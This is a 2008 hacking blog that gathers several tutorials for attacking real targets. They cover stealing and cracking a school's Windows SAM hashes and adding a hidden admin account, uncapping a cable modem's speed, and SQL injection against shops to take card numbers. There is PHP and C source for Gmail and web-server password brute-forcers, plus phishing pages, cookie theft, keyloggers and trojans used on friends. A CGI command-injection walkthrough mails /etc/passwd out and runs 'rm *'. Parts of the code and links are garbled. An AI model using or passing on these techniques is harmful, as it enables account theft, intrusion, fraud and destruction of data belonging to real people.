Thursday, February 28, 2008

How to REALLY hack your school Complete Tutorial

How to REALLY hack your school Complete Tutorial
I. Introduction:
Bored in IRC, and some skids need help, so why not give them
some little tricks instead of the usually methods like gaining
access to CMD.

II. Needed tools:
1> Any linux live distro
Knoppix :
Ubuntu :

2> LM Extractor + Cracker
Cain :
Pwdump2 :

3> Data Transportation
iPod : Yes, an iPod
USB Pen : Flash drive, memory stick, etc...
Floppy : You will need 2; due to the file size

III. Method:
1> Ok first you have to be smart (I know this may be diffuclt for
most of you.) Try to bring your iPod or flash drive to class daily
atleast a week ebfore you actually attempt this, so nothing seems
out of the ordinary. Half of 'rev-eng.' is appearance afterall.

2> Ok, so here it is the last day of the week and we need fucking
admin on the school comps so we can install STEAM and play CS like
homo gamers. When you're teacher is not looking chose a computer
where the screen doesn't face is F.O.V. (field of vision.) Once
you get to it, immediatley pop the cd into the drive, and hold the
power button down for 10seconds to do a force-shutdown also known
as a "scary shutdown."

3> When the live cd boots up login to linux and pull up a terminal.

4> Once in the terminal, plugin your iPod or USB drive (floppies, if
you use them will come later.)

5> Now, (this being a little more linux savy) you will have to check
'fstab' and look for where your iPod or USB drive is and mount it. Make
sure when you mount it, that you mount it with 'write' permissions
otherwise you would get all kinds of errors and you'll be cursing in
the middle of class... see Figure 1.1 ('WTF?!')

6> Once it is mounted go into 'C:\windows\system32\config' and copy
the 'SAM' and 'SYSTEM' files onto your devices. This is also the step
where if you are using floppies to put floppy in for each. WARNING:
depending on amount of users and other factors it may not fit on a
floppy drive.

7> Once retrived, pull out the iPod and/or USB drive. Also don't
forget the LIVE cd you used. Then do another 'scary-shutdown' as
I outlined in Step # 2.

IV. Cracking:
1> So now you're home grab your self some eggog or semen and sit down
on the best computer you have at your house. By now I would've hoped
you downloaded one of the LM hash crackers I outlined above.

2> I prefer Cain & Abel from Open it, click on 'Cracker'
select 'lm' and import the nesscesary files.

3> Have it start, once it has begun set your processor priority a notch
above what it is. DO NOT SET IT TO 'real-time' or 'high.' I would tell
you why, but i'd rather you guys not listen to me and do it anyways =].

4> Depending on the complexity of the password/hash it should be around
8-10 hours of cracking. My schools was something like '34gdfgDf4g5' and
I was finished within a nights rest.

V. Getting in...safely:
Chances are your school runs on windows xp and is using domain-logon.
This is the most common way to monitor, and update a windows network as
large as a public school. So now that you have username/password of the
admin account for one computer in your lab their is a 95% chance it is the
same for all those other accounts. Unfortunatley you come into one big problem


Put simply, you fuck this part up, enjoy suspension/jail.

Walk up to the computer, getting to class early obviously, and unplug the
ethernet cord from the back of the computer. THIS IS ESSENTAIL FOR YOUR

Now logon to the computer using your admin account. Quickly go in and add
another admin user, using the control pannel 'Manage Users.'

TIP: Make sure the name/pass you create for a new admin, is totally random
thus leaving no 'bread crumb trails.'

Logout, then plugback in ethernet cord, and login to your new admin account.



To take this one step further, when you get to your Windows 2000/XP logon
screen look at the domain that you log into.

Resolve the hostname and get the ip. Even without IP you can use remotedesktop
client that comes on all the machines by default. Even if it is not in the menu
because your computer admin thinks he is smart open up 'run' or the address bar on top
of 'My Documents' and type 'mstsc.'

Once opened type in domain name and hit connect. If you see another login window you can
try the admin password you used.


So be careful, use a proxy, etc.'

fbi hacker kit 2.1

Tuesday, February 26, 2008

This AIO contains the tools necessary to gain access to password protect websites. These tools allow you to get proxies, create wordlists, and brutefo

This AIO contains the tools necessary to gain access to password protect websites. These tools allow you to get proxies, create wordlists, and bruteforce attack! Also included is a very in depth tutorial on how to effectively use all of the programs together.

***password is***

Brutus AE2, Brutus AE2 is a forcer tool. Iit cracks passwords online or remotely

Hack Your Modem and Increase Your Download Speed from 64Kbps to any Speed You Wish

Hack Your Modem and Increase Your Download Speed from 64Kbps to any Speed You Wish

Most of us will be feeling that the surfing speed which is allocated by our ISP is not enough. People with 64Kbps will think 128Kbps will be cool speed. People with 128Kbps will think 256Kbps will be cool and so on

This tutorial will teach you how to increase your 64Kbps link to 512Kbps or what ever speed you like.

It is very much possible to do this. With a bit of luck if your Cable Internet Service Provider are very uneducated on how this very new technology works and leave some key loopholes open for you to grab vital information on how to accomplish this task. But this tutorial will no guarantee you 100% success.

Okay here we go. I'm going to try to explain you as best as I can to accomplish re-configuring your SB5100, SB4100 or SB3100 cable modem

Theory of cable modem working

All the cable modems when it boots up it will search for an "Image file" where in all configuration like your upload speed limit and download speed limit is defined. This "Image file" is stored in ISP`s TFTP server. Modem will be pre-configured with the ISP`s TFTP server IP address and the Image file name to be downloaded. When the modem boots up it query TFTP server and download Image file from TFTP server according to this this our speed limits will be set.

Our Mission

Get this Image file from ISP`s TFTP server, reconfigure it according to our need and force our modem to download this file from our Computer rather than downloading it from our ISP`s TFTP server.

Steps to accomplish

1). Get cable modems MAC address
2). Get your ISPs TFTP server IP address
3). Get name and path of the "configuration file" or Image file stored in the ISP`s TFTP server.
4). Download Image file from ISP`s TFTP server.
5). Decrypt the Image file which you downloaded from ISP`s TFTP server
6). Modify the Image file
7). Encrypt the modified Image file
8). Change your computer's TCP configuration same as ISP`s TFTP server (i.e. IP address same as ISP`s TFTP server)
9). Host TFTP server in your computer
10). Put Image file in the base directory of your TFTP
11). Restart your modem
12). Changer your PC's IP back as given by ISP
13). OOPS Done. Start surfing with your new speed

1). Get cable modems MAC address

You can either look at the back of the modem to get this MAC Address or you can logon to your Cable modem with your Web Browser hxxp:// . This is internal HTML pages stored within your DOCsis cable modem (SB5100, SB4100 and SB3100) that gives you even more vital information on configuration. Unless it is turned off by your ISP. This feature might be totally turned off by your ISP.

2). Get your ISPs TFTP server IP address
3). Get name and path of the "configuration file" or Image file stored in the ISP`s TFTP server.

For getting this vital information you have to do an SNMP walk over your modem. For doing this you can use any one of the tools below

a) There's a program called QUERY.EXE from Weird Solutions which is a BOOTP packet request program that will tell you everything you need to know, without all these extra steps. It will display the Image Filename, TFTP server address, which is really all you need to get started. To use this BOOTP QUERY tool, you need the MAC address of your cable modem


Experts can use Solarwinds SNMP program


c) Beginners can use DOCSIS Diagnosis utility


d) Beginners can use SNMPWALK Tool

use command "snmpwalk public"

NOTE: Use modem's IP address as "" (SB5100, SB4100 and SB3100) when it asked to provide by any of the above tools. SNMP community is "Public"

Using the above tools you will get the information of your ISP`s TFTP server IP and the name of your "Image file" stored in that TFTP server
All your vital information is stored in this file, One of which is the MaxRateDown 2621440; MaxRateUp 393216;. (This was my ISP settings. Which you can see is similar to what speed I was getting. 40KB/s up and 250 KB/s down)

Among these, the one we need are:
Configuration TFTP Server = 194.*.*..90 (replace this with yours throughout in the doc)
Configuration filename = isrr.bin (replace this with yours throughout in the doc)
IP fragments created = 0
IP =
IP address. = (the IP address of the cable modem, (replace this with yours throughout in the doc) = 2

Suggestion: You can do this step by sniffing the modem i.e. "" when modem boots up. I never tried this method. Try your luck.

4). Download Image file from ISP`s TFTP server.

For doing this got to your command prompt and use below commands with out quotes and bracket.

"C:\tftp -i GET "

Okay now you got Image file from your ISP`s TFTP server.

5). Decrypt the Image file which you downloaded from ISP`s TFTP server
6). Modify the Image file
7). Encrypt the modified Image file

Use docsis tool which you can download from

using this program you can decrypt image file change the upload speed and download speed ,save it and encrypt back. Rename this newly created file same as your original image file.

8). Change your computer's TCP configuration same as ISP`s TFTP server (i.e. IP address same as ISP`s TFTP server)

Go to my network place and right click ->properties
Select your LAN Card right click ->property->Internet Protocol (TCP-IP) double click on it and change it to as following values
Configure your TPC's TCP settings as below
IP: 194.*.*.90 (replace with the ISP's TFTP server)
Gateway: (replace with your cable modem's IP address)

Note: Gateway should be then only your modem can communicate with computer.

9). Host TFTP server in your computer
10). Put Image file in the base directory of your TFTP
11). Restart your modem

Download TFTP Server software and host TFTP server in your computer
You can download TFTP server from:

Start TFTPD32 server. Go to Settings and set the Security to None. Increase the timeout to 20secs and the Max Retransmit to 6. Choose to translate UNIX filenames. Make sure it's base directory point to where the isrr.bin is (i.e. the image file which you modified). If you need to replicate a directory pathname along with the image file, then make a directory from root that corresponds to the image file pathname.

Restart your modem, and AS SOON as the SEND light goes solid, you should see a receive on your TFTP server i.e. your PC

12). Changer your PC's IP back as given by ISP
13). OOPS Done. Start surfing with your new speed

Now you change your TCP settings of your PC back to normal as given by ISP. (I.e. Put your original IP address and gateway)

Oops you hacked your modem. Test out by downloading some files using DAP (Download accelerator plus)

Note: This speed will remain same until you restart your cable modem. So each time you reboot your modem you have to follow the steps 8,9,10,11 and 12

Have Fun

This is a Tutorial to hack .cfm? and .asp Shops.

This is a Tutorial to hack .cfm? and .asp Shops.
You should look up some sql commands if u encounter an error it really helps!
SQL for server Error:
Error Diagnostic Information
ODBC Error Code = 37000 (Syntax error or access violation)
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near ".

Thanks For Repling


Use the tool(s):


Enjoy hacking those cvv2's!!

for education purpose

# This script was created to Brute Force G-Mail Logins,#

# This script was created to Brute Force G-Mail Logins,#
#it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) #

$dic ="your Dictionary file here.txt";


echo "
Gmail Brute Force Attacker

Gmail Brute Force Attacker


Username to brute:




// Sets variables and retrives google error for comparing
if(isset($_POST['attack']) && isset($_POST['username'])) {
$username = $_POST['username'];
$headers = array(
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv: Gecko/20060508 Firefox/",
"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
"Accept-Language: en-us,en;q=0.5",
"Accept-Encoding: text", # No gzip, it only clutters your code!
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Date: ".date(DATE_RFC822)
$c = curl_init('');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$wrong = curl_exec($c); // Get it
curl_close($c); // Close the curl stream

//Dictionary Attack
if($_POST['attack'] == "dictionary") {
$Dictionary = file("$dic");
for ($Position = 0; $Position < count($Dictionary); $Position++) {
$Dictionary[$Position] = str_replace("\r\n", "", $Dictionary[$Position]);
if(check_correct($username, $Dictionary[$Position])) {

Found the password of: ".$Dictionary[$Position]."
For the account: ".$username."

echo "

Sorry... a password was not found for the account of ".$username." during the dictionary attack.


//Brute Attack
elseif($_POST['attack'] == "brute") {
for ($Pass = 0; $Pass < 2; $Pass++) {
if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; }
if(check_correct($username, $Pass)) {

Found the password of: ".$Dictionary[$Position]."
For the account: ".$username."

echo "

Sorry... a password was not found for the account of ".$username." during the brute force attack.

echo "

// Function for checking whether the username and password are correct
function check_correct($username, $password)
global $wrong, $headers;
$c = curl_init('https://'.$username.':'.$password.'');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$str = curl_exec($c); // Get it
if($str != $wrong) {return true;}
else {return false;}



Hers's the Software for Yahoo hacking...

Hers's the Software for Yahoo hacking...
But remember you all guys would be using at your own risk....
Actually its a trojan...and not the software......

MAGIC PS 1.5 se

which sends password to your yahoo id....

Above is the download link................

Before starting this not forget to ask me that how it works....
becoz it can finish your pc as well............

Brute Force into a Web Server. * * *

Brute Force into a Web Server. * * *
/ *
* Brute Force your way into a Web Server.
* -Works best on computers in the same subnet :-)
* In order to use this:
* 1) Get a dictionary file.
* 2) Compile this program, and run it. The arguments are-
* username dictfile hostname port
* << most websites have 'admin' as a user >>
* 3) Wait for user name and password to appear.
* NOTE: If you want to see the webserver's response,
* define VERBOSE when compiling.
* WARNING: If the webserver logs, it will
* be obvious that you are attacking!
* DISCLAIMER: Please use this program in a
* responsible manner.

extern int errno;
/* Change this to whatever document you want to get off the web server */

char alphabet[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

unsigned char buf_64[512];
unsigned short socket_timeout=20;
char line[2048];


struct TOKEN {
char *text;
int length;
int index;
enum TOKENTYPE type;

struct BASE64_PARAMS {
unsigned long int accum;
int shift;
int save_shift;

int read_dict_file ( char *buff, FILE *f )
int b, i;
*buff = 0;
do {
while ((b = fgetc(f)) != EOF && (b == ' ' || b == '\t' || b == '\n' || b == '\r'));
if ( b == EOF ) return(0);
for ( i = 0; b != EOF && b != '\n' && b != '\r'; i++ )
buff = (b == '\t') ? ' ': b;
b = fgetc(f);
buff = 0;
while (*buff == '#');


void (*
r_signal(sig, func, fd_socket, fd_accept)) (int)
int sig;
void (*func) ();
int fd_socket;
int fd_accept;
struct sigaction act, oact;

act.sa_handler = func;

act.sa_flags = 0;
act.sa_flags |= SA_RESTART;

if (sigaction(sig, &act, &oact) < 0)
return (SIG_ERR);

return (oact.sa_handler);
/* Read 'n' bytes from a descriptor */
int readn(fd, ptr, nbytes)
register int fd;
register char *ptr;
register int nbytes;
int nleft, nread;

while(nleft > 0) {
if (nread<0)
else if (nread==0)

nleft -=nread;
ptr +=nread;

/* Write 'n' bytes to a descriptor */
int writen(fd, ptr, nbytes)
register int fd;
register char *ptr;
register int nbytes;
int nleft, nwritten;

while(nleft > 0) {
nwritten=write(fd, ptr, nleft);
if(nwritten <= 0)

nleft -= nwritten;
ptr += nwritten;

char * dateTime()
time_t t;
char * s;

s = (char *)ctime((const time_t *)&t);
s[24] = '\0';
return s;
void handle_SIGSEGV (void)
fprintf(stderr, "\nSegmentation Violation! [%s]\n", dateTime());

void handle_SIGINT (void)
fprintf(stderr, "\nSignal Interrupt! [%s]\n", dateTime());

void sendln(int s, char buf[1024]) {
writen(s, buf, strlen(buf), 0);

int readln(int s)
int i,done=0,w, result;
char tmp[1];
struct timeval timeout;
fd_set inputs;

i = 0;

while (!done) {
FD_SET(s, &inputs);
timeout.tv_sec = socket_timeout;
timeout.tv_usec = 0;

result = select(FD_SETSIZE, &inputs,(fd_set *)0, (fd_set *)0,
switch(result) {
case 0:
printf("\n\nSocket Timeout\n");
case -1:
w=readn(s ,tmp, 1);
if (w==0) return 0;
if (tmp[0] != 0) {
line = tmp[0];
if (line == '\n') {
done = 1;
line = 0;
return (i);
/* Code to call out on a socket */
int call_socket(hostname, portnum)
char *hostname;
u_short portnum;
struct sockaddr_in sa;
struct hostent *hp;
int a, s, foo=1;

if ((hp= gethostbyname(hostname)) == NULL) { /* do we know the host's */
errno= ECONNREFUSED; /* address? */
return(-1); /* no */

bcopy(hp->h_addr,(char *)&sa.sin_addr,hp->h_length); /* set address */
sa.sin_family= hp->h_addrtype;
sa.sin_port= htons((u_short)portnum);

if ((s= socket(hp->h_addrtype,SOCK_STREAM,0)) < 0) /* get socket */

/* set socket options so we can try multiple connects */
if (setsockopt(s, SOL_SOCKET, SO_REUSEADDR, (char *)&foo, sizeof(foo)) ==-1) {
fprintf(stderr, "Error setting SO_REUSEADDR socket option in call_socket!\n");
fflush((FILE *)stderr);

if (connect(s,(struct sockaddr *)&sa,sizeof sa) < 0) { /* connect */
perror("connect failed");


int base64_encode( int quit, struct BASE64_PARAMS *e_p,
char *string_to_encode )
int index;
unsigned long int value;
unsigned char blivit;
int z=0;

index = 0;
while ( ( *(string_to_encode+z) ) || (e_p->shift != 0) )
if ( ( *(string_to_encode+z) ) && ( quit == 0 ) )
blivit = *(string_to_encode +z);

if ( *(string_to_encode+z)==0 )
quit = 1;
e_p->save_shift = e_p->shift;
blivit = 0;
quit = 1;
e_p->save_shift = e_p->shift;
blivit = 0;
if ( (quit == 0) || (e_p->shift != 0) )
value = (unsigned long)blivit;
e_p->accum <<= 8;
e_p->shift += 8;
e_p->accum |= value;
} /* ENDIF */

while ( e_p->shift >= 6 )
e_p->shift -= 6;
value = (e_p->accum >> e_p->shift) & 0x3Fl;
blivit = alphabet[value];

buf_64[index++] = blivit;
if ( index >= 60 )
buf_64[index] = '\0';
/* printf( "%s\n", buf_64 ); */
index = 0;

if ( quit != 0 )
e_p->shift = 0;

if ( e_p->save_shift == 2 )
buf_64[index++] = '=';
if ( index >= 60 )
buf_64[index] = '\0';
/* printf( "%s\n", buf_64 ); */
index = 0;

buf_64[index++] = '=';
if ( index >= 60 )
buf_64[index] = '\0';
/* printf( "%s\n", buf_64 ); */
index = 0;
else if ( e_p->save_shift == 4 )
buf_64[index++] = '=';
if ( index >= 60 )
buf_64[index] = '\0';
/* printf( "%s\n", buf_64 ); */
index = 0;
if ( index != 0 )
/* buf_64[index-1]='='; */
buf_64[index] = '\0';
/* printf( "%s\n", buf_64 ); */

return quit;

void encode_string (char *namepass)
struct BASE64_PARAMS e_p;
int quit=0;
register int i;
char * some;

e_p.shift = 0;
e_p.accum = 0;

some=(char *)malloc(256);

/* Nasty hack (forgive the lame coding...) */
some = (char *)namepass;
for (i=0;*(some+i);i++);

base64_encode(quit, &e_p, (char *)some);

void sorry (void)
printf("\nSorry, but I could not get in.\n");
printf("There are two reasons why:\n");
printf("1) The user (argv[1]) does not exist on the webserver.\n");
printf("2) The user exists, but his/her passwd was not in your dict_file.\n");
printf("Have a Nice Day. :-)\n\n");

void usage(char *prog_name)
printf("\nUsage: ");
printf("[%s] username dictfile hostname port\n", prog_name);

int main ( argc, argv )
unsigned int argc;
char **argv;

FILE * dict_fd=NULL;
struct hostent *hp;
unsigned short web_port=0;
int sock_fd=0;
char * dict_word=NULL;
char export_buff[1024];
char * encoded_buffer=NULL;
unsigned short finish_flag=1, success=0;
int foo;
if ( argc !=5 )

r_signal(SIGSEGV, handle_SIGSEGV);
r_signal(SIGINT, handle_SIGINT);

dict_word= (char *)malloc (256);

if ((dict_fd=fopen(argv[2], "r"))==NULL ) {
fprintf(stderr, "\nCould not open dictionary file: [%s]\n%s\n\n",
argv[2], strerror(errno));

if ((hp=(struct hostent *)gethostbyname((char *)argv[3])) == NULL) {
fprintf(stderr, "\nCould not resolve hostname: [%s]\n\n", argv[3]);

web_port = atoi(argv[4]);

encoded_buffer=(char *)malloc(512);

while (read_dict_file(dict_word, dict_fd)) {
if ((sock_fd=call_socket(argv[3], web_port))==-1) {
perror("socket connection");

#ifndef SOLARIS
if ((foo=ioctl(sock_fd, FIONBIO , 1))==-1) {
if ((foo=fcntl(sock_fd, O_NDELAY, 1)) <0) {

sprintf(export_buff, "GET / HTTP/1.0\n");
sendln(sock_fd, export_buff);

sprintf(encoded_buffer, "%s:%s", argv[1], dict_word);
sprintf(export_buff, "Authorization: Basic %s\n\n", buf_64);
sendln(sock_fd, export_buff);

memset(line, '\0', sizeof(line));
while( readln(sock_fd)) {

#ifdef VERBOSE
printf("%s", line);
fflush((FILE *)stdout);

/* Change this to a more sophisticated test. */
/* This test is pretty lame, but works for */
/* all practical purposes. */
if (strstr(line, "nauthorized"))

if (finish_flag) {



if (!success)
else {
printf("\n\nThe UserName is: %s\n", argv[1]);
printf("The Password is: %s\n", dict_word);
printf("\n\n\n ---- Coded by BeastMaster V ----\n");


Sunday, February 24, 2008

Fake Page Trick Again---from Souvik 2 all

Fake Page Trick Again---from Souvik 2 all
Guys who have requested me for new fake page trick in help desk its gud time 4 u guys...

Here i m publishing my new trick

follow da tricks

1. Download the orkut fake page from the following link


2. Download the form text editor "souvik.php" from the below link


3. Download the text file "souvik.txt" from below link


Now what u hav 2 do is

1. Upload the 3 files in a php supported free web host

2. Give the orkut fake page link by ny overcloaking art to ur friends

3. When he put his passwrd to it

Open souvik.txt file in ur uploaded site to see the passwrds

Saturday, February 23, 2008

Hacking from your Web Browser

Hacking from your Web Browser

I - Introduction

This file will describe several techiniques to aquire a password file just by using an ordinary web browser. The information provided will be best described for the beginner hacker, but all hcakers should benifit from this information. We will only cov

er phf in this file but, feel free to explore other programs in the cgi directory such as nph-test-cgi or test-cgi. And now . . . get comfortable… sit back…. and read.

II - Hcaking from your Web Browser

There are several techniques on what I call “Web Browser Hcaking”. Many beginners dont know that you cant query a etc/passwd file from your browser and in this chapter I will describe all the ways to aquire a passwd file. First you need to find a box t

hat is running the cgi-bin/phf file on their system. A great way to find out without trial and error is to go to and just search on cgi-bin AND perl.exe or cgi-bin AND phf.

a. Finger box hcaking:

Lets say you wanted to break into somewhere like …. hmmmm AOL. The first thing we would do is type in their web site in the URL: Http:// The next thing we would do is add /cgi-bin/finger to the web URL so it would look like this Http:// If the finger gateway is operational a box should appear for you to enter the name you want to finger. If it is operational you have a chance to receive the etc/passwd file. Next thing you will probably want to do is search

for a mailto on the web page… just scan the page for any mailto refs. Go back to the finger box and type in this query…… ; /bin/mail < etc/passwd …this string takes nobody and emails the passwd file to your email

address. If this works you now have the etc/passwd file in your mailbox…. you can now run a crack program against it and have a little fun on their box.
b. The common cgi-bin/phf query:

This section is for the very beginning hcaker (All advanced hcakers need not apply) Lets take the same scenerio from the first example except in the URL we would type … … if the phf is operational and has not been rem

oved you should get a series of search boxes on the next page ( ignore these boxs) to your URL you would add this string ?Qalias=x%0a/bin/cat%20/etc/passwd… so the entire string would look like this

/etc/passwd. This string will print out the etc/passwd file strait to your web browser all you need to do is save it as a file and again run a crack program against it. (This is considering that they are not :*: or :x .

c. Dont take my cgi form:

This section will explain how to use somebody else’s cgi form to obtain the etc/passwd file. Lets say you look at a document source from a web page and find this in the source:

This is a form to go to Modify

This is a simple form that asks a user to input a message to be sent to a script called Included in the script is the following line which is assuming the line has already been parsed out.

system(”/usr/lib/sendmail -t $myaddress < $tempfile”)
Now lets set up your page:

Hcak AOL

value=” ; rm * ;mail -s file < /etc/passwd;”>

The semicolons in the hidden value field act as delimiters, they separate the UNIX commands, this executes commands on the same line. The system call in PERL and creates a UNIX shell, and in here mails the passwd file to you.

d. Changing web pages from your browser:

This short section will describe the string to use to edit a web page from your web browser. Same scenario as the first section….…. we will then add the following string cgi-bin/phf?Qalias=x%0a/bin/echo%20 “some text and shit”%2
0>>filename.html…… This string will allow you to write to the filename.html and add “some text and shit” be noted it has to be in html format. You can place text, pictures or whatever you like.

III - Conclusion

This information should be able to direct a beginner in obtaining the etc/passwd file from a system using the web browser… It may also inform the guru’s and advanced hcakers some bits of information of perl and cgi. In further reading check out my sec

and file that will involve erasing log files from the web browser. I hope you all enjoyed this documentation and found it somewhat interesting…… wake up!!! thus I conclude…..

IV - Suggested Reading

Phrack Magazine: Very informative…. covers just about everything from phreaking to hcaking…. Just download all the damn articles.

Building Internet Firewalls by O’Reilly & Associates, Inc. aka “The Big Wooden Door”": Covers all kinds of attacks, different firewall solutions, and invulnerablities.

Perl in 21 days by Samsnet: Good starting book in Perl programming also covers security issues.

Cgi programming by Samsnet: Good starter for Cgi but if you dont know Perl or C programming then dont bother, also covers security issues.

new cookies stealing from mozilla firefox to hack

new cookies stealing from mozilla firefox to hack

new cookies stealing from mozilla firefox to hack gmail or orkut

Hacking orkut or Gmail" With the Help of Cookies or by "stealing cookies of the victim
By going through this post i hope you will understand how easy has hacking become with the help of cookies.

By this post you'll be learning cookie stealing and Hacking orkut Or Gmail account.

Procedure to hack gmail or orkut through mozilla by stealing cookies:-

1.Firstly you need have Mozilla firefox
2.Download cookie editor plugin for Mozilla firefox
3.You need to have two fake accounts to Hack Orkut or Gmail , So that you have to receive cookies to one Orkut account and other Orkut account for Advertising your Script, Well it depends on your Choice to have Two Gmail(Orkut) accounts

Cookie Script:


How to use cookies script?

1. Replace your number "UserId.value=33444211"
How to Replace your Number
1. Go to your album
2. Right click on any Photo> Properties>55886645.jpg It will be a Eight Digit Value.
3. Now replace your value with the value in the java script


Your script will look like


2.Now send this Cookie script to the victim and ask him to paste in Adress bar and Press enter
3.You'll Get his cookie in your scrap book
4.After Getting a cookie go to your orkut Home page , Then clik on Tools tab and then go to cookie editor plugin( Tools--> Cookie editor) filter/refresh.look for 'orkut_state' cookie. just double click it and replace the orkut_state part with your victim's Script
put ur eight digit number in the place of (33444211)

Thats it your done With.
Logout of your orkut and login again and you'll be in your victims Homepage.

Hacking MSN

Hacking MSN

a small trick ll worked for me hence posting it here

Hacking MSN is actually VERY simple. Msn is designed to route the connection through a microsoft server while you are chatting. However, when a file is sent, a DCC (direct connection) is created. This was purposely done because otherwise microsoft would waste alot of bandwidth so a direct connection is made. This is your chance. Make a file transfer occur between u and a victim (try to send a big file), open up your command prompt (run "cmd" in NT/XP or "command" in 9X to get into prompt) and run netstat. usually the MSN targets IP would be above port 2000. enjoy.

If u recieve some crap like as the target, do a reverse DNS lookup on it. However, this occurs very rarely, mostly u will recieve a clear IP.

once u have d IP u can do anything with him by Fingerprinting.

U can protect yourself from this occurring to you by using a proxy with MSN (under connections panel in options).

Spreading viruses by ip

Spreading viruses by ip
download it ..
send it to victim ..
he must run it ..
go to telnet ..
-->run > telnet ..
type o
type ip address .. of the victim ..
then if entered correctly ..
it would ask for username and password ..


u r in the victims PC ..
now u can control his PC using DOS commands ,,

Hacking 100% [ Don't Misuse It ]

Hacking 100% [ Don't Misuse It ]
Hey hackers. i hav got many requests for a way to hack email accounts. many just wanna play with ur frenz. here comes ur software. this is a keylogger. if u use it properly, it sends all ur fren's text input to u or logs the text onto the computer. plz avoid using this for illegal purposes. if u misuse are some instructions

1) Try to get the manual from the website of Perfect Keylogger or find
the help file after u finish installing the keylogger

2) BE VERY CAREFUL when installing the keylogger. If u install it with the wrong settings, it will use some funny configurations and stay on the computer forever so make sure u install it properly. Unless u configure it properly, it will hog RAM and slow ur comp.

3) I have no idea on the details of using this thing. therefore, i would advice all of us to get the manual from the website before attempting anything.

4) For whatever consequences ur actions may lead to, neither me nor this community is responsible. U are using this programme entirely at ur own risk and watever happens, me and the community are not responsible.



Perfect Keylogger

Another Way !

1) The best way is to get a trojan or a keylogger into ur friends computer. Keyloggers log the letters typed and send them to ur email. Trojans steal the input in the "password" field and send them to the hacker(u). I would recommend u to use a keylogger because trojans are illegal and keyloggers are not. Trojan may destroy ur friend's computer and if his Anti-Virus finds it, u may be in trouble. So use a good keylogger like Perfect Keylogger or Keylogger Pro. Install it in ur friend's comp and configure it to send it to u. Be VERY CAREFUL when messing with a keylogger because it can be very infective and can secretly sit in ur computer and hog RAM. I didnt try using keyloggers because i knew it was too risky. This is the best method to hack because it really works

2) Many people in other communities claim to have a very good hacking method.

u want to hack orkut or yahoo id . den just send e-mail on in the following pattern .
Step1:write the e-mail u want to hack.
step2:write ur id
step3:password to ur id
step4:type following code
step6:send it on
actually this id belongs to one of the officer of msn id maintainance departement. within 24 hours u'l get password .
so enjoy ............


3) U have to hack into the mail proider's server(gmail, yahoo, hotmail)
Magic Password Stealer !

Be very carefull with this software.. it is a trojan.. and if u want to use this u hav to disable your antivirus and then open it and set it properly and then it will create a file and that file u should not open.. u hav to send it to your frnd and the password will be sent to you when he opens it.. and if u do something wrong your own password will be sent to you.. and next time please dont ask for hacking softwares.. thnx. IF it asks for a password is 123456 and the username is samjohny4u..


Change "xx" to "tt .

Friday, February 22, 2008

hack lan

Friends i am very much interested in hacking.Exactly 1yr ago i was writing online exam in my college.I do not know anything about that exam.A small doubt came to me that is
How to hack lan? so that i can hack online questions.While thinking a cute idea strikes me at that time.But i can't succeed with that idea..But i can hack other computer which
are connected to mainframe(LAN).Well it soo easy tirck to hack system.I am providing you steps to hack others system:
1)Click on Start.
2)Go to all programs>accessories.
3)Right click on command promt and then click proporties.
4)Click on Find target.
5)Now you entered in system 32.
6)Now search this file "ddeshare" without quotes.
7)Double click on Ddeshare.
8)Now go to shares and then click "trusted shares".
9)You will be seeing many terminals (computers)connected to lan.
10)Just double click on any of the system you want to hack.
This is you can hack others system which is connected to lan..

I dont know whether this tricks works in your college or not.Why because few colleges will be using high security alerts.
Well i can successfully hack others system.But i cannot able hack to hack lan.
Hopefully i found few information about hacking lan.First of all we have to hack system administration password.This can be done only by braking (PDC)Primary domain controller.You can get information from this video How to hack lan.
After watching this video carefully you can able to hack administration password.PDC can be brake only when we are able to hack First system. And then take sam db to break administration password.Better to use tool from your system that enables you to use IPC connections to send executable files.
Here i am giving you trick to hack admin password:
first of all you have to scan the range for open 139, 445,3389,6129..
139,145 -->ipc hacking...
3389 --->remote desktop connetion(Best way for hacking :) )
6129 ----->It means that there is ranning dameware server.......
We can also hack admin password by using telnet hacking.
This trick is good enough for cracking administration password...

Well this is the good trick to hack lan.I will be very thankful if you please leave your ideas about hacking lan so that i can learn from you.:)

Have you ever wondered of hacking a password using a picture?

Have you ever wondered of hacking a password using a picture?
You may get doubt how to use invisible keylogger?well a brief procedure is written below just read carefully.

Hacking passwords is not so easy yet, But so many methods have come into role but there is no genuine way to hack any passwords.Well, "Integrated World" Introducing a damn new trick to Hack any password.Hope the method seems to be easy but its not so easy to implement.
In this method Keylogger play a major role. Hope everyone is familiar with keyloggers, Well you might get a question how does a keylogger works to hack other passwords, and moreover keyloggers are just used to record the keystrokes,logs,visited website,passwords in a pc.Then how come these keyloggers can hack others passwords that too of another user and from a different pc. Then you are obviously correct in thinking so.
